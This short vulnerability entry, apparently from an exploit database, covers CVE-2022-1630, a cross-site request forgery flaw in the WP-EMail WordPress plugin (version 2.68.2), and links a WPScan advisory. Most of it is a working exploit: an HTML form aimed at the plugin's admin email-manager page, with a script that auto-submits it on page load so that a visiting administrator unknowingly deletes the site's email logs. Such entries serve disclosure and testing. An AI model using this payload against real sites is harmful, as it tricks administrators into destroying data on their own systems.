CVE: CVE-2022-1630

Name: WP-EMail (wp-email)

Version: 2.68.2

Date: 2022-04-15 21:42:18

Advisory: https://wpscan.com/vulnerability/178d0c49-3a93-4948-8734-f3d7518361b3

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin.php?page=wp-email/email-manager.php" method="POST">
    <input type="text" name="delete_logs_yes" value="yes">
    <input type="text" name="delete_logs" value="Delete">
</form>
<script>
    document.forms[0].submit();
</script>